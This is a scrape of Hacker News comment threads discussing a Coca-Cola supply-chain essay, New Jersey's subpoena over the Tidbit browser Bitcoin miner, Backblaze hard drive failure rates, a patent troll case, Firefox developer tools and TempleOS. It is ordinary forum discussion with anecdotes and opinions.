He forgot to mention the Colombian paramilitaries that break up Coke bottling plant unions by kidnapping their children. Funny how "globalization" is presented in a saran-wrapped, sanitized version.
29
InclinedPlane 4 days ago 0 replies      
This is good, although I think it reaches just a little too far when it says that the number of nations that could produce a can of coke is zero. If the US so desired it could grow coca leaves, and kola nuts, and use locally produced aluminum, etc.
30
Smachine 5 days ago 0 replies      
Think of all of the jobs the making of Coke provides. Oh here we go......lol
31
argumentum 5 days ago 0 replies      
A brilliant paean to the free market and the invisible hand. Milton Friedman once described the manufacture of a humble pencil in this way.

(edit: just saw a link to an essay entitled "I, Pencil" at the bottom .. this might have pre-dated Friedman).

32
WiggleYourIndex 4 days ago 0 replies      
Clean water tastes better.
33
joshfraser 5 days ago 1 reply      
1 can of coke contains 160% of your recommended daily intake of sugar. But you won't see that on the label because money.
10
MIT Students Battle State's Demand for Their Bitcoin Miner's Source Code
412 points by msantos  2 days ago   123 comments top 25
1
will_brown 2 days ago 4 replies      
There is a lot of confusion in this thread regarding basic concepts of the law.

1. The NJAG is not prosecuting the MIT student(s) (at least not yet). Therefore, this is not similar to the alleged overzealous prosecutors in the Swartz case.

2. A subpoena is a writ compelling testimony or evidence. A subpoena is not synonymous with being a defendant.

3. NJAG served one MIT student with a subpoena to turn over documentation (source code, downloads, users, etc.) for a program which may be being used by third party websites in a way that violates the rights of NJ residents vis-a-vis unauthorized access to computer systems.

4. It seems there is an issue raised arguing NJAG does not have jurisdiction over the MIT student(s). Personally I would find this analysis the most compelling because it is at the intersection of where facts and law meet.

5. EFF is arguing that complying with the subpoena may violate the student's right against self-incrimination. I think this is a losing argument where one's right against self-incrimination is rather limited, generally to information contained within their mind and not typically extended to documentation and records.

6. Though this is not at issue, it would be almost impossible for the MIT student(s) to have committed a crime, as the crime would require intent. It would be nearly impossible to prove the student(s) intended that their code be downloaded by third-party websites for the specific purpose of running on the end users' computers without their knowledge. It would be on par with charging a gun manufacturer criminally for intending that their guns be manufactured and sold for the exclusive purpose of committing crimes.

2
bertil 2 days ago 3 replies      
That article describes a thought experiment that would A. remove an ad, and B. should (but doesn't) trigger a BitCoin miner. It's clearly marketed as an illustration to an idea. I'm failing to see the consumer fraud. Is this like accusing a car-manufacturer of manslaughter because their latest concept-car didn't have seat-belts?

I would like to know if that's selective reporting from Wired, or spectacular fishing from NJ state attorney.

Also, neither the hackathon, nor MIT appear to be in NJ: what is their jurisdiction? Those two issues should be clarified in any basic coverage of the incident: at this point, it is plain bad reporting.

3
eli 2 days ago 1 reply      
The EFF has the actual documents in the case posted https://www.eff.org/cases/rubin-v-new-jersey-tidbit

Based on a quick skim, this is the closest NJ comes to making a case: https://www.eff.org/document/nj-attorney-general-response-ef...

4
teachingaway 2 days ago 1 reply      
New Jersey's Position is laid out in their 3/7/2014 filing. https://www.eff.org/files/2014/03/07/njs_memo_in_opposition_...

Here's the relevant parts (lightly edited):

The Division issued the Subpoena and Interrogatories in furtherance of its investigation into an entity called Tidbit. Tidbit is a group of students who developed a software code that may have hijacked the computer resources of consumers within the State of New Jersey and improperly accessed and/or used such computer resources to mine for bitcoins for the benefit of Tidbit and its customers and without any notice to, or obtaining consent from, New Jersey consumers, in possible violation of the New Jersey Consumer Fraud Act ("CFA") and Computer Related Offenses Act ("CROA"). Bitcoins are a digital medium of exchange that can be traded on online exchanges for a dollar value. Bitcoins are "mined" through the use of computer resources to solve complex algorithms. Many times, consumers' computer resources are unknowingly accessed by entities through software code or otherwise in order to mine for Bitcoins.

Plaintiff's own description of its services strongly suggests that the code it developed is, in fact, designed to hijack consumer's computers. .... Further, contrary to Plaintiffs allegations in its brief, the Division specifically found Plaintiff's code on the websites of entities located in New Jersey. Furthermore, the Division determined that the code was active.

The following representations, among other things, are made on the Tidbit Website: "Monetize without ads"; "Let your visitors help you mine for Bitcoins;" and "Built on the bleeding edge." The Tidbit Website further provides: "How does it work? ... [1] Make an account - Sign up with your Bitcoin wallet ... [2] Paste the code - we'll give you a snippet to put in your website ... [3] Cash Out! - We'll send a transaction to your Bitcoin wallet." ...

E. The Division's Undercover Investigation

On February 7, 2014, the Division re-accessed the Tidbit Website and "Sign up" button. While on the Tidbit Website, the Division submitted Sign-up Information to Tidbit using an undercover e-mail address and an undercover bitcoin wallet id. In response to receiving the Division's undercover Sign-up information, Tidbit sent the Tidbit Code to the Division's investigator via a confirmation page on the Tidbit website ("Confirmation Page"). The Tidbit Code that the Division received includes the Division's undercover bitcoin wallet id. Additionally, among other things, the Confirmation Page states: "Your embed code - Paste this at the bottom of your HTML page, and your visitors will start mining Bitcoins for you!" (emphasis in original).

5
downandout 2 days ago 0 replies      
There is an option in all browsers to disable javascript. That, combined with the fact that you are requesting files from a website (as opposed to them being surreptitiously forced onto your machine) implies consent to execute the code sent to you. Finally, the code made no attempt to go beyond user-granted access limits (in this case the ability to run javascript in the browser, a decision which is entirely under the control of the user).

I cannot see how a fraud or hacking case of any kind could be made here, even if they got the code.

6
JacobEdelman 2 days ago 3 replies      
I feel like this article is a bit one sided. It doesn't ever state NJ's case against the students and draws strong parallels to Aaron Swartz (a hero to many people). A lot of the time these parallels seem to be weak, the student who did this is an MIT student who built a piece of software at a hackathon, this has almost nothing to do with Aaron Swartz's situation except it involves a young programmer and MIT.
7
borlak 2 days ago 0 replies      
Tidbit inspired me to write my own web-miner, which I open sourced. It's hacked together as I was really just trying to learn how the cryptocoin&mining stuff worked. The mining rate you get with straight javascript is truly abysmal, even with web workers (much worse than the standard cpuminer).

I found a couple examples that do the scrypt part with GPU in browser, but your browser has to support custom shaders, I think (I forget the details), and the version most browsers support doesn't allow this (again, my memory is sketchy about the details).

Anyway, here you go, NJ! https://github.com/borlak/cryptocoin_scrypt_stratum

8
csense 2 days ago 2 replies      
Don't users implicitly consent to a website using their CPU and bandwidth for arbitrary tasks while the website is open, by using a browser that downloads and runs arbitrary JavaScript and allows it to XMLHTTPRequest?

Even if the code in question was being run on a publicly accessible website, was used by a New Jersey consumer, and was fully functional and actually mined Bitcoins (all of those points are disputed by the students' counsel)...The only thing that's being taken by the website operators would be users' CPU cycles and bandwidth. And if the users have implicitly consented to the website's arbitrary use of those resources, how is anyone being harmed?

9
tgb 2 days ago 5 replies      
What law did they supposedly break?
10
lotsofmangos 2 days ago 2 replies      
They want source code for a client side javascript miner that they saw on a website. Was their right mouse button broken?
11
joshdance 2 days ago 2 replies      
This seems insane to me. What law was broken? What could even be considered remotely criminal about this? Seems like a gross over reach by the gov.
12
peter303 2 days ago 1 reply      
I'd be curious to find out why NJ AG would get so paranoid about this? I couldn't really find a link to their side of the story.

The National Science Foundation did discipline a researcher who did some mining on their computers.

13
Cogito 2 days ago 0 replies      
Perhaps most interesting in my reading of the documents provided by the EFF is the correspondence regarding the counter-sue made by Rubin against the NJAG.

In it NJAG lay out exactly what they think Rubin did:

...Plaintiffs development, use and deployment of the Tidbit Code which, by plaintiffs own description, strongly suggests the code was designed to hijack consumer's computers to mine for bitcoins, including the computers of New Jersey consumers. Further, prior to the issuance of the Subpoena and Interrogatories, the Division determined that the Tidbit Code was present and active on the websites of entities located in New Jersey and Plaintiff affirmatively sent the Tidbit Code to the New Jersey based entities.

They posit that the code was

1. Designed to hijack a consumer's computer for the purpose of mining bitcoins

2. The computers targeted for hacking (implicitly the entire internet) include those of New Jersey consumers

3. The code was found on websites owned by New Jersey entities

4. Rubin sent the code "affirmatively" to those New Jersey entities

I think 1. is the weakest point, but that weakness is based on my understanding of the definition of 'hijack'. 2. and 3. seem to follow easily from assumptions, or could be easily shown as fact. 4. seems like it would be harder to prove, but I don't know the implications of the term affirmatively used here.

14
everettForth 2 days ago 0 replies      
This sounds like some trivial code, not even fully functioning, that was written during a hackathon. Why does New Jersey care?

It wouldn't even make sense as a business model anymore, because ASIC miners are so much more efficient than GPUs, but I heard many people talking about building this kind of service years ago.

NJ could pay a software developer to write them code to let people generate small amounts of bitcoin in a browser. Why would they possibly want this MIT student's code so badly?

15
codexon 2 days ago 1 reply      
I don't understand how their javascript based miner is feasible.

Mining bitcoins with a CPU is an extremely futile endeavor, and on top of that, it is implemented in asm.js.

Even with thousands of workers, GPU and ASIC mining is anywhere from hundreds to over a MILLION MH/S while modern cpus top out at 20 with most around 5.

https://en.bitcoin.it/wiki/Mining_hardware_comparison

16
chris_wot 1 day ago 0 replies      
Funny how voting machine companies won't release their source code, but MIT must for Bitcoin? Just a thought.
17
larssorenson 2 days ago 0 replies      
I don't understand how it could be considered consumer fraud or computer fraud and abuse if it was clearly indicated to the visitor that their browser would be used as a BitCoin miner in lieu of being displayed Ads. Assuming they weren't told, I could see the issue but it didn't seem like they were trying to dupe visitors.
18
squozzer 2 days ago 0 replies      
It sounds to me like NJ wants to start mining bitcoin. Nothing is sacred when you're running a deficit I guess.
19
trhway 2 days ago 0 replies      
They need to bring in a couple of seasoned enterprise developers who can hand off any project in such a state that it would be easier to rewrite it from scratch than to even just successfully build it, less run/debug/understand...
20
ndesaulniers 2 days ago 1 reply      
HACKERS!!! WONT SOMEONE PLEASE THINK OF THE CHILDREN!!!?
21
Thesaurus 2 days ago 1 reply      
Is there another website other than wired with this article?
22
u124556 2 days ago 1 reply      
They could just, you know, give it to them?
23
javajosh 2 days ago 0 replies      
How is surreptitious use of compute resource any different than the surreptitious accumulation and analysis of data exhaust? If this moves forward to prosecution, I'd argue it will actually open up an avenue of attack against Facebook, Google, et al.
24
joshfraser 2 days ago 2 replies      
We're lucky to have an organization like the EFF that fights this nonsense. It's a good time to support their work.

https://supporters.eff.org/donate

25
stealthlogic 2 days ago 0 replies      
Fuck New Jersey.
11
Hard Drive Reliability Update Sep 2014
374 points by nuriaion  1 day ago   155 comments top 24
1
disordr 1 day ago 3 replies      
I really want to applaud backblaze for publishing these reports and stats. Too many companies closely guard this information that really helps the larger community. Based on the previous blogs from backblaze, when I built out our new hadoop cluster, I purchased 1450 Hitachi drives. I plan to gather our failure rates and publish them as backblaze does. Thanks for blazing the path!
2
zaroth 1 day ago 8 replies      
Since annual failure rate is a function mostly of age, it would be interesting to see a line chart of cumulative failure rate vs age. But since new drives are continually being added to the population, there would be fewer drives in the data set as you moved up each curve.

I guess you could calculate confidence intervals at quarterly intervals, and so the error bars would get larger as age increases and 'n' decreases.

How would you calculate the CI for failure rate? It's not binomial or poisson, since failure rate goes to 1 over time...

A little searching turns up http://rmod.ee.duke.edu/statistics.htm which I'm sure completely explains how to do this... (rolls eyes). I hate that this is how statistics is commonly taught. Knowing which distribution to use and applying it correctly can actually be intuitive if taught properly. It doesn't always need to be an exercise in alphabet soup / deriving from base principles.

3
ChuckMcM 1 day ago 1 reply      
One of the challenges I have with this analysis is that a 'failure' isn't just that your drive is no longer working, it is that your drive isn't working and you have to go replace it. The operational costs of replacing a drive have three parts, loss of production while the drive is offline, operator time to physically replace the drive and prep it for re-entry into the system, and transactional costs of doing a warranty replacement (filling out the RMA form, getting a valid RMA, shipping the and receiving replacements). We minimize the latter by doing RMAs in batches of 20 but it's still a cost across those 20 drives. (and the population of 40 drives which exist as spares are effectively not available for production). It isn't as simple as 'sure drives fail a bit more often but we don't expect to use them that long.'
4
michaelbuckbee 1 day ago 3 replies      
Biggest takeaway was at the end, with the "enterprise" drives being slightly less reliable than the consumer ones at half the cost.
5
emodendroket 1 day ago 8 replies      
How times have changed; Seagate used to be (or at least have the reputation of being) the most reliable and Hitachi the least.
6
shiftpgdn 1 day ago 2 replies      
I manage a computation cluster for an oil and gas exploration company. We have a 50% failure (and rising!) of Seagate Constellation drives in 250GB, 1TB and 2TB configurations. My sample size is fairly small at a few hundred drives but man does it keep me busy.
7
archgrove 1 day ago 1 reply      
Not that I use even 0.001% of the disks that BackBlaze go through, but my anecdata suggests the same. The only dead hard disks I have on my desk at the moment are Seagate, and they dominate the disks I've sent back in the last few years.

However, they are cheap, and they do honour their warranties. Would just be nice if they didn't have to quite so much.

8
saosebastiao 1 day ago 2 replies      
Tangential: When are you going to offer a linux client?
9
tambourine_man 1 day ago 3 replies      
I love reading these posts from Backblaze, but what I never understand is that they are getting a cost of U$ ~0.05/GB with their storage pods:

https://www.backblaze.com/blog/why-now-is-the-time-for-backb...

At these rates, why not use S3? What am I missing?

10
makmanalp 1 day ago 1 reply      
Anyone have any reliability information on hitachi's new NAS drive series? They're supposed to build on the 7k3000 etc, but specifically tailored for NAS / raid situations, like WD reds. One major difference is that they're 7200 rpm instead of 5400 which is most non-high-end NAS drives.
11
cake 1 day ago 2 replies      
I wish there was something similar for SSDs.
12
justcommenting 1 day ago 1 reply      
There are well established methods for time-to-failure and time-to-event data not used here. The author makes no effort to control for the multiple, obvious biases created by the analytical approach employed. A few simple graphs would give a much more telling view of these data.
13
TheLoneWolfling 1 day ago 0 replies      
I'd be interested to see what a graph of percentage remaining versus time since installation looks like for these. Might give a better picture of what's going on.
14
BuckRogers 23 hours ago 1 reply      
I keep seeing this stuff over the years, so I go buy something other than Seagate like WD... and they fail within a year. So I replace it with a Seagate and no problems for years. See another report that says Seagate is terrible- repeat process.

I'm just going to keep using Seagate until my anecdata refutes the reality I live in.

15
shadeless 1 day ago 0 replies      
I recently bought 3TB Western Digital Red, following their advice from [1], but now I see that it has yearly failure rate of 8.8%, bummer.

Off-topic, but It's a shame that BackBlaze isn't available in some countries, I'd love to use it. What would be the best alternative to it, Tarsnap?

[1] https://www.backblaze.com/blog/what-hard-drive-should-i-buy/

16
rancor 1 day ago 0 replies      
Used in a small file server, my net failure rate on Seagate's consumer 3TB drives has been over 50% thus far. The pair of their SAS drives I currently have in use have been fine, although both of them are still below a year of service life...

Edit: Just checked my drive status, and yet another one has dropped. If I'm doing my math correctly, that's 75% of the drives that weren't DOA...
17
cgore 1 day ago 2 replies      
My main Linux box has quite a few hard drives in it from a large range of time. About 4 weeks ago the oldest of them all died: it is from 2007, so about 7 years old, which I think is pretty good for a consumer drive that's on 24/7. It was a Western Digital Caviar SE WD3200JB, 320GB. I replaced it with a 2TB drive.

[No lost data, I do daily backups.]

18
sauere 1 day ago 1 reply      
Hard drive age is a bad parameter to use. It should be the hours the drive was actually powered on.
19
BradRuderman 1 day ago 1 reply      
Let's get a blog post describing how they handled reimbursements for the drive farming. I imagine it to be incredibly complicated to cross reference a receipt with a product at that scale, especially since all the products were the same.
20
arb99 1 day ago 1 reply      
Very off topic, but their html is wrong:

"<a href='https://www.backblaze.com/blog/hard-drive-reliability-update... src='https://www.backblaze.com/blog/wp-content/uploads/2014/09/bl... alt='Hard Drive Failure Rates by Model' width='560px' border='0' /></a>"

should be "width='560'" not "width='560px'"

21
ars 1 day ago 1 reply      
No Toshiba hard disks apparently.

HGST and Western Digital are the same company, but it seems they have separate product lines? It's confusing.

22
mercurialshark 1 day ago 1 reply      
All my WD and Seagate drives have failed within two years of use. Call me the luckiest.
23
robomartin 1 day ago 0 replies      
Thanks for sharing such useful data. I just had a Seagate drive fail. Was able to recover data since the last local backup with various tools. It took hours of repair work.

I've been procrastinating about getting off-site backup. This post on HN reminded me that I've been meaning to get an account going with your company for a while. I just signed up and will test on my machine before deploying to other machines in my business. Thank you.

24
larrys 1 day ago 2 replies      
Question for the OP here (or for anyone else).

Do you burn in new drives before using? I typically will take any new drive and do some type of stress test [1] on it for 18 to 24 hours to see if it fails with that initial constant use.

[1] Constant reformatting for example writing 0's to the entire disk 7 times etc.

12
Another Patent Troll Slain. You Are Now Free to Rotate Your Smartphone
381 points by VanL  2 days ago   41 comments top 9
1
crhulls 2 days ago 6 replies      
Startups can pool together to fight these guys. My company, Life360 got sued after raising $50m. They thought this meant we had money to write checks from, but instead we decided to use it to fight.

We're basically being sued for allowing you to click a marker on a map initiating a phone call.

This obviously should never have been patented, so we are doing all the legal defense work and sharing it with the startup community.

See www.stopagis.com if you want to see how we really pissed off our troll.

And public shaming also works, the CEO of our troll didn't own his domain, so we bought it and drive traffic to the site whenever people search for his name (Malcolm Beyer www.malcolmbeyer.com). They don't like that we "aren't playing by the rules".

2
r00fus 2 days ago 9 replies      
"Rotatable sued us and immediately asked for $75,000 to go away. We refused. And we fought. Its Rackspace policy to not pay off patent trolls, even if it costs us more to fight. Eventually Rotatable offered to just walk away but we refused again. Just as we promised last year, we challenged the patent and the USPTO invalidated it.

This means that Rackspace will not pay one penny to this troll, nor will Apple, Netflix, Electronic Arts, Target, Whole Foods or any of the other companies sued by Rotatable for how they use screen rotation technology in their apps."

It surprises me why there aren't joint defense funding efforts in place to put these industry pests to bed... Clearly Apple, Google and Microsoft would have been next on Rotatable's target list if Rackspace had caved - and like weeding, rooting them out early will prevent infestations.

Is it because the big corps perhaps view the trolls as worth their pain - what function could they serve?

3
jmedwards 1 day ago 0 replies      
Rotatable sued us and immediately asked for $75,000 to go away. We refused. And we fought. It's Rackspace policy to not pay off patent trolls, even if it costs us more to fight. Eventually Rotatable offered to just walk away but we refused again. Just as we promised last year, we challenged the patent and the USPTO invalidated it.

This is an excellent strategy and will pay dividends to RackSpace in the long term: what minor patent trolls will touch them now?

4
ps4fanboy 2 days ago 2 replies      
This has really bought rack space a lot of good will in my mind. Every time I read an article like this I find myself wanting to do business with them more and more.
5
luxstyle 2 days ago 2 replies      
Why do trolls still try to sue Rackspace? They publicly proclaim their anti-troll policy. If 88% of these cases kill the troll when they go through the courts fully, I would stay well away from them if I was a patent troll.
6
shittyanalogy 1 day ago 2 replies      
This is fun and all but calling the patent troll slain is a bit optimistic. Most likely "Rotatable Technologies" was specifically created to sue companies for this patent so they could simply go out of business if things got too rough. The larger patent troll, I'm sure, considers this loss a normal part of doing business and will continue with other patents. This does not get any better simply because one patent was invalidated.

We need legislative change, not to fight fire with fire. Public perception of these companies being trolls and detrimental to innovation is important but this is not a victory. It is simply not a loss and still an enormous waste of resources. We need patent reform.

7
arbuge 2 days ago 0 replies      
>> We are still fighting some of the trolls that have come after us and we expect to win those cases too. Without changes in the law we believe that the only way to end the plague of patent trolls is by fighting every troll that comes at us and we encourage all others to do the same.

Needless to say, Rackspace can afford this strategy whereas smaller companies, who have no full-time attorneys on staff and little funds to retain outside counsel, generally cannot. A change in the law to legislate patent trolls out of existence is still needed, basically yesterday.

8
dthunt 2 days ago 1 reply      
I am a strong advocate of the following principle:

Defeat your enemies.

Rackspace deserves some big props, here. More should follow their example.

9
tempodox 1 day ago 0 replies      
Nice going, and a service to the community. Thanks!
13
New Developer Tools Features in Firefox 34
362 points by xOnic  2 days ago   65 comments top 21
1
azinman2 2 days ago 2 replies      
Ok debug logging into a table is probably one of the best improvements to logging I've seen in a long time. I kinda want this in every programming language. There are so many useful things about it, especially the ability to then randomly sort it at will!
2
bshimmin 2 days ago 3 replies      
The jQuery events inspector looks super useful.

I keep meaning to give Firefox another try - after ditching it for Safari, and then Chrome, some years ago - but I never quite find the motivation.

3
diafygi 2 days ago 1 reply      
Is the bug that treats re-requests source files when opening the debugger fixed yet?

https://bugzilla.mozilla.org/show_bug.cgi?id=156435#c52

4
genericacct 2 days ago 2 replies      
I was excited about the WebIDE but apparently it's only for firefox OS apps. Is there any way of linking a webIDE to devTools? I'd pay for a tool that lets me click on a jsconsole error message and then takes me straight to the editor at that line and column on the original file.
5
frankzander 2 days ago 0 replies      
What about firebug? How long will firebug live with sight of the developer tools becoming better and better?
6
Kiro 2 days ago 2 replies      
Finally a way to easily inspect and delete cookies on the run. I remember getting voted down here for complaining about it previously.

EDIT: Ok, read-only. Too bad but at least they have it planned.

7
allan_s 1 day ago 1 reply      
something that got "broken" for me in recent version of firefox (I think starting with 32) is that doing a console.log of a very long string does not display the whole string anymore

i.e it will print

"a looooooong string [..]" (with the [..])

same if I try to observe the variable in the debugger. And I can't find a way to get the full string in anyway, I understand for a lot things you don't want to print accidentally a 200k characters longs string as it will use a lot of memory for maybe nothing, but in my current use case (getting long xml documents to copy paste them in a beautifier / send to colleague as attachments for bug report etc.) it breaks my workflow (I'm posting here because google does not seem very talkative about this issue)

8
Tloewald 2 days ago 2 replies      
A ton of very compelling stuff. I hope it all works nicely; I have found the Firefox dev tools to be weirdly clunky of late and keep going back to Chrome, but this may drag me back.
9
geekam 2 days ago 0 replies      
Finally, the storage manipulation has arrived. Now I can get rid of Firebug completely.
10
pdknsk 2 days ago 1 reply      
The only feature in Firefox I miss in Chrome is the view that shows the stacked layers of a website. I dismissed it when I first tried, but it can be surprisingly useful. It's no reason to make me switch to Firefox though.

https://developer.mozilla.org/docs/Tools/3D_View

11
leeoniya 2 days ago 1 reply      
is there any way of making the inspector show simple textContent inline with the nodes without having to unfold them? i keep going back to Firebug for this.

    <em>test</em>
rather than

    <em>
       test
    </em>

12
dubcanada 2 days ago 1 reply      
Does anyone know if there is a way to theme the developer tools? Like you can do in Chrome?

Like https://chrome.google.com/webstore/detail/devtools-theme-zer...

13
ck2 2 days ago 1 reply      
I'm more excited about this coming in the next version(s)

https://wiki.mozilla.org/Electrolysis

http://arewee10syet.com/

Back in August they were debating enabling by default in November but it is probably not ready for prime-time yet

https://wiki.mozilla.org/Electrolysis/Meetings/2014-08-21

14
gioele 2 days ago 2 replies      
How big are the developer tools compared to the rest of Firefox? 5% of the total size? 10%?

Can't the more sophisticated tools be split into a separate extension, leaving only some basic things in the distributed package?

15
arenaninja 2 days ago 0 replies      
Sweet, sweet console.table()! I've never been happy with the way that console.log works for objects/arrays, I'm eager to use this one
16
kolev 2 days ago 0 replies      
This is great! Firefox Aurora has been my main browser for over 6 months and now these great improvements will keep the status quo for me!
17
iSnow 2 days ago 0 replies      
Oh, this is neat. This is probably the first time the built-in debugging tools make me think about ditching FireBug.
18
ux-app 2 days ago 0 replies      
great to see the iframe switcher. Was such a pain to manually switch the context between top and child frames.
19
vvh 2 days ago 0 replies      
good list of tools, thanks!
20
Gonzih 2 days ago 1 reply      
Sourcemaps?
21
arahaya 2 days ago 0 replies      
14
TempleOS: 5 minute random code walkthrough
357 points by GuiA  2 days ago   168 comments top 33
1
Mithaldu 2 days ago 1 reply      
These videos already make me inordinately happy, because everything about templeos is beautiful, and having it explained is so very nice. However the most beautiful take-away from these videos to me is that Terry has a bird. :)
2
chippy 2 days ago 3 replies      
I want to build in some kind of primitive networking into this OS - just so one machine can talk to another... it's on my side project list. Anyone had much experience with the code?

Also - Love the positive comments in this thread. Proud of this community.

3
M4v3R 2 days ago 5 replies      
It makes me sad that even with his illness he delivered more working code than I probably will ever do. Maybe not because I can't, but because I procastinate so much and I really have hard time focusing on doing work.
4
microcolonel 2 days ago 0 replies      
I had a conversation with Terry on freenode a couple years ago, back when TempleOS was "losethos".

I was convinced, given the context, that losethos was just computer malware, and he had a hard time articulating why it wouldn't be, and ended up just getting frustrated at the most cursory of questions.

A few days later, somebody who had witnessed the conversation informed me that he was a well known probable schizophrenic, and it really bummed me out that I didn't know or handle the situation better.

While he hasn't convinced me of anything other than that having nice uniform names for types can be helpful(U64, S64, F64, etc.), that conversation gave me some perspective on what it means to be schizophrenic.

5
userbinator 2 days ago 1 reply      
What makes this amazing is that Linus Torvalds probably wouldn't be able to pick a random piece of code in the Linux kernel and do this.

The fact that it's quite featureful for an OS of ~100kLOC - including an assembler and compiler for a language with some OOP - makes this even more interesting. "The shell is a compiler/interpreter" concept somewhat reminds me of Lisp machines too.

6
orbifold 1 day ago 1 reply      
One concept I really like is to just identity map the whole address space and run everything with full privileges. With a sufficiently high level memory safe language with good concurrency and memory regions support, you should be able to statically enforce most of the guarantees that the hardware provides and at the same time get rid of context switches. Untrusted code in a memory unsafe language would simply run in a VM.
7
Igglyboo 2 days ago 0 replies      
This guy never ceases to amaze me, he's insanely smart and dedicated.
8
andrewljohnson 2 days ago 2 replies      
Random numbers coming from God is cute. I'm not a theist, but I also feel awe of the elusive concept of true randomness. I read something about this from him before, and it pops up in the 1st video.

The flashing Menu button and marquee filename are interesting. A distraction to most people, but I wonder if they help the author Terry stay focused.

9
sitkack 2 days ago 0 replies      
The world is definitely better off with Terry. Thanks man and keep on doing your thing.
11
incision 2 days ago 1 reply      
Neat, subscribed.

I make a point to read TempleOS' comments. Looking past the frequent nastiness they're sometimes interesting and even poetic, in a way that's as sadly familiar as the intonation in these videos.

12
tlo 2 days ago 4 replies      
Can somebody explain in a few words what TempleOS is?
13
callahad 2 days ago 1 reply      
I love the idea of a built-in hotkey for jumping to a random line across the entire codebase. Like a fuzzer, but for your understanding of your project.

...and now I really want to write a vimscript to do the same.

14
codezero 2 days ago 0 replies      
I actually like the idea of having to pick a random routine in a large codebase and then explaining it on the fly. Terry does a pretty good job at this, he's done similar things in other videos.
15
qznc 1 day ago 0 replies      
I like the idea for quick impromptu presentations, so a made a script for git: https://github.com/qznc/dot/blob/master/bin/git-randomline

$ vi $(git randomline)

Then explain to someone in five minutes

16
curiousDog 2 days ago 3 replies      
As much as I appreciate what he did (most of us wrote a bare bones OS in school anyway), I'm not a fan of his racist comments. Some are incredibly specific like "I can't believe a nigger is the boss of a white guy, that just isn't right" or something like that. It's like he has these thoughts actually bottled up but cannot control them because of his illness. Nonetheless, my bad to rain on someone with such an illness. All the best to him.
17
LukeB_UK 2 days ago 1 reply      
All the flashing bits and marquees... I never thought that someone could create an OS that reminds me of GeoCities
18
cmdrfred 2 days ago 2 replies      
I hope medical science can one day find a way to help our friends like Terry find their way home. Until then all we can do is let him know that he is loved and respected by his peers, Terry you are one of us.
19
broken 2 days ago 1 reply      
"showdead -> yes" is the only reason i have a HN account.
20
gojomo 2 days ago 1 reply      
What if the giant computing platform battle of 2040 is TempleOS vs. Urbit, because everyone else got neurobricked by the iBrain/mindroid 0day of 2034?
21
ivans__ 2 days ago 0 replies      
Terry is always a huge inspiration to me!
22
donatj 1 day ago 0 replies      
A little over a year ago I wrote a post about the problems I saw in Coffeescript, Terry commented that switching to TempleOS would prevent my complaints as I could use his C variant. Made my day to have him comment.
23
no_future 2 days ago 1 reply      
Terry is a goddamn hero and an inspiration to us all
24
axaxs 1 day ago 0 replies      
I'd just be happy for a usable Holy C. Growing up in the south, I can perhaps sadly deal with the political or racist rants. Putting that aside, I think the man is a genius who has much to offer the world. I'd love for someone like this to mentor me, though such a thing is hard to find outside academia.
25
desireco42 2 days ago 0 replies      
After looking at some of videos and intro, he is onto something with this. You can always run this in vm, I can see how permissions and ownership can get in a way. By using subroutines, he gets every ounce of juice out of his machine. Also document format, based on his description, sounds awesome.
26
smegel 2 days ago 0 replies      
If nothing else, this guy's got staying power.
27
thaumaturgy 2 days ago 1 reply      
Does anyone have the code for the PRNG handy, or is familiar with it? It'd be kinda neat to see how that bit works.
28
MarkPNeyer 2 days ago 0 replies      
i've been through a lot of psychosis and feel like i can understand this guy. i had a psychotic break in late 2012 and thought strongly that catholicism was created to teach the world computer science concepts.

when you start reading about roko's basilisk, it's not a stretch at all to imagine that primitive human beings exposed to an artificial intelligence would think of it like 'god'.

29
namecast 2 days ago 1 reply      
Shine on, Terry, you crazy diamond.

If nothing else, TempleOS is a testament to how much one programmer can accomplish absent feedback or collaboration from others. For better or worse.

30
Davesjoshin 2 days ago 6 replies      
How come his rants have a lot of racial slurs? Am I missing something? http://www.templeos.org/Wb/Accts/TS/Wb2/Rants/TAD/2014/09/Ra...
31
elwell 2 days ago 1 reply      
Let's all hope Terry doesn't learn AI enough to equip TempleOS with the ability to learn (as well as networking). There is no guessing as to what a randomized OS with a god-complex might do.
32
cmdrfred 2 days ago 2 replies      
What if he's right?
33
cschep 2 days ago 3 replies      
Whhhaaaaat the hell? Is this real?
15
One Thing Well A weblog about simple, useful software
364 points by tete  3 days ago   46 comments top 16
2
Argorak 3 days ago 1 reply      
This tumblr doesn't quite live up to its name: http://onethingwell.org/post/97725615916/busybox

BusyBox is great and everything, but it's definitely not subscribing to the "One Thing Well"-philosophy, quite the contrary: everything in one.

3
asymmetric 3 days ago 1 reply      
OT, but it's heartening to see a link to an RSS feed next to Twitter and G+. I find that more and more sites are abandoning this public, open source standard in favor of proprietary platforms.
5
state 3 days ago 3 replies      
Sorry, but there is nothing I find more annoying than the "Never miss a post!" spam that Tumblr now inserts in to every page post acquisition.

Perhaps someone could do one thing well and come up with a blogging platform for this nice project?

6
eps 3 days ago 0 replies      
11 pages of Windows software! Who would've thought it exists :)

http://onethingwell.org/tagged/windows

7
tete 3 days ago 0 replies      
Disclaimer: Not my blog, but found it today and really loved it.
8
fizixer 3 days ago 1 reply      
- See also: suckless.org

- An LFS build off kernel.org (the kernel) and github (the rest of userland) would be an interesting experiment.

9
juef 3 days ago 0 replies      
10
denizozger 3 days ago 0 replies      
I love the idea but not the implementation. Categorising software according to purpose and tech stack would be the best.
12
tretiy3 3 days ago 1 reply      
Very good.Is there any way to subscribe (no count tumblr rss twitter)?
13
alanning 3 days ago 0 replies      
Short examples would greatly enhance comprehension for me
14
nXqd 3 days ago 0 replies      
This site could be named unix_hunt :D
15
zomg 3 days ago 0 replies      
the original "product hunt"! :)
16
doctorpangloss 3 days ago 3 replies      
> Simple, useful software

I came expecting examples of to-do lists, mail clients, clever messaging apps, etc. There are a handful of those.

Instead, the majority of apps are described by sentences where literally every word would be unfamiliar to a typical computer user. For example, "Cram is a functional testing framework for command line applications based on Mercurial's unified test format."

Simple is in the eye of the beholder.

16
The biggest thing with small patches (2004)
338 points by ohmygeek  10 hours ago   28 comments top 13
1
doughj3 10 hours ago 0 replies      
I think this is great advice. While I've only contributed to a couple open source projects and haven't lead my own large ones, I completely agree. There's more to submitting patches than writing the patch- understanding contribution guidelines (code style, documentation, testing), responding to feedback, etc, these are all extremely important in actually contributing to a project. And having even just that little patch merged in feels great when you're starting out.

Plus, no one wants to make a big helpful functional contribution only to be thrown away because they weren't aware of how the community operates. Small patches have a low risk as far as learning about how to contribute, even if the patch is rejected for whatever reason.

Though this seems somewhat obvious, it's nice to have it stated and validated by the leadership of one of the largest open source projects.

2
efuquen 10 hours ago 1 reply      
